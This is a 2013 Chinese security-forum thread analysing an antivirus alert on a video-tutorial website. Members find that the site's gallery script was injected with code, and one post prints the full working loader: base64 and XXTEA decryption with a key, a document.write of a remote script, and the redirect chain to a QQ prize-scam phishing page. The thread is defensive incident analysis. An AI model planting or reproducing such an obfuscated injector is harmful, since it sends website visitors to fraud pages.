应该是网页误报，求帮忙分析【挂马BY zhengshixin163 】

显示全部楼层 · 发表于 2013-5-11 14:26:01

本帖最后由哀酱俏佳人于 2013-5-11 21:09 编辑

http://www.52liunian.com/html/2012/rumen_0805/2455.html 这个网站，如下图。应该是没问题的，以前小A就不报，祁连山老师的教程视频网站，人人网上他的连接，按说是没有问题的。祁连山老师cs3的视频我也看过，全面而且制作质量高，肯定不会刻意搞这些动作。

显示全部楼层 · 发表于 2013-5-11 14:32:50

网页卡，多发了。不好意思，求删除

显示全部楼层 · 发表于 2013-5-11 15:09:07

KIS也报了。目测是真挂毒了吧

显示全部楼层 · 发表于 2013-5-11 15:21:12

eav也报

显示全部楼层 · 发表于 2013-5-11 15:38:42

嗯，我这里小a也弹窗，不明原因。
放在URL在线检测网站看了看，结果链接：http://urlquery.net/report.php?id=2416334

显示全部楼层 · 发表于 2013-5-11 15:40:16

本帖最后由 zhengshixin163 于 2013-5-11 15:55 编辑

找到钓鱼代码
t="Dacv2lRQG17idRE1rqzoDDVqnaUvJYZm5Ou6fhyB7GnT+5HxClCUbZCko4eR51V1zJikNEzepXnZWa62dPIUcEOTBO4=";
t=utf8to16(xxtea_decrypt(base64decode(t), '123456789abcdef'));
document.write (t);

解密后为
<SCRIPT src="http://www.googleadsl.com/spcode/cp.js"></script>

跳转到

http://www.230596.com/d/file/news/world/sizer.js

复制代码

引入

http://www.joinin.com.cn/en/flash/project/demo.asp

复制代码

这个地址再引入

http://www.230596.com/d/file/news/world/resed.js

复制代码

具体行为：
右下角出现QQ中奖诈骗小窗口，10s后弹出提示【尊敬的QQ用户：您即将获得腾讯公司送出的奖金￥88000元以及三星Q4笔记本电脑一台。您的领奖验证码是：8663】并跳转到

http://www.ctdsb.net/caches/configs/%23/in.html

复制代码

显示全部楼层 · 发表于 2013-5-11 15:45:12

相关代码：

function utf8to16(str){var out,i,len,c;var char2,char3;out=[];len=str.length;i=0;while(i<len){c=str.charCodeAt(i++);switch(c>>4)
{case 0:case 1:case 2:case 3:case 4:case 5:case 6:case 7:out[out.length]=str.charAt(i-1);break;case 12:case 13:char2=str.charCodeAt(i++);out[out.length]=String.fromCharCode(((c&0x1F)<<6)|(char2&0x3F));break;case 14:char2=str.charCodeAt(i++);char3=str.charCodeAt(i++);out[out.length]=String.fromCharCode(((c&0x0F)<<12)|((char2&0x3F)<<6)|((char3&0x3F)<<0));break;}}
return out.join('');}
var base64DecodeChars=new Array(-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,63,52,53,54,55,56,57,58,59,60,61,-1,-1,-1,-1,-1,-1,-1,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1);
function base64decode(str)
{var c1,c2,c3,c4;var i,len,out;len=str.length;i=0;out = "";while(i<len)
{do
{c1=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c1==-1);if(c1==-1)
break;do
{c2=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c2==-1);if(c2==-1)
break;out+=String.fromCharCode((c1<<2)|((c2&0x30)>>4));do
{c3=str.charCodeAt(i++)&0xff;if(c3==61)
return out;c3=base64DecodeChars[c3]}while(i<len&&c3==-1);if(c3==-1)
break;out+=String.fromCharCode(((c2&0XF)<<4)|((c3&0x3C)>>2));do
{c4=str.charCodeAt(i++)&0xff;if(c4==61)
return out;c4=base64DecodeChars[c4]}while(i<len&&c4==-1);if(c4==-1)
break;out+=String.fromCharCode(((c3&0x03)<<6)|c4)}
return out}
function long2str(v,w){var vl=v.length;var sl=v[vl-1]&0xffffffff;for(var i=0;i<vl;i++)
{v[i]=String.fromCharCode(v[i]&0xff,v[i]>>>8&0xff,v[i]>>>16&0xff,v[i]>>>24&0xff);}
if(w){return v.join('').substring(0,sl);}
else{return v.join('');}}
function str2long(s,w){var len=s.length;var v=[];for(var i=0;i<len;i+=4)
{v[i>>2]=s.charCodeAt(i)|s.charCodeAt(i+1)<<8|s.charCodeAt(i+2)<<16|s.charCodeAt(i+3)<<24;}
if(w){v[v.length]=len;}
return v;}
function xxtea_decrypt(str,key){if(str==""){return"";}
var v=str2long(str,false);var k=str2long(key,false);var n=v.length-1;var z=v[n-1],y=v[0],delta=0x9E3779B9;var mx,e,q=Math.floor(6+52/(n+1)),sum=q*delta&0xffffffff;while(sum!=0){e=sum>>>2&3;for(var p=n;p>0;p--){z=v[p-1];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[p]=v[p]-mx&0xffffffff;}
z=v[n];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[0]=v[0]-mx&0xffffffff;sum=sum-delta&0xffffffff;}
return long2str(v,true);}
t="Dacv2lRQG17idRE1rqzoDDVqnaUvJYZm5Ou6fhyB7GnT+5HxClCUbZCko4eR51V1zJikNEzepXnZWa62dPIUcEOTBO4=";
t=utf8to16(xxtea_decrypt(base64decode(t), '123456789abcdef'));
document.write (t);

复制代码

其中有UTF8to16、XXTea算法和Base64算法

显示全部楼层 · 发表于 2013-5-11 15:52:39

http://www.52liunian.com/statics/js/jquery.sgallery.js

复制代码

剩下的就是zhengshixin163说的

骄傲的使用Chrome

Powered By Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31

显示全部楼层 · 发表于 2013-5-11 18:19:19

卡巴和360杀毒报毒

显示全部楼层 · 发表于 2013-5-12 09:40:06

zhengshixin163 发表于 2013-5-11 15:40
找到钓鱼代码
t="Dacv2lRQG17idRE1rqzoDDVqnaUvJYZm5Ou6fhyB7GnT+5HxClCUbZCko4eR51V1zJikNEzepXnZWa62dPI ...

谢谢！那我看看能不能举报下

[已鉴定] 应该是网页误报，求帮忙分析【挂马BY zhengshixin163 】

评分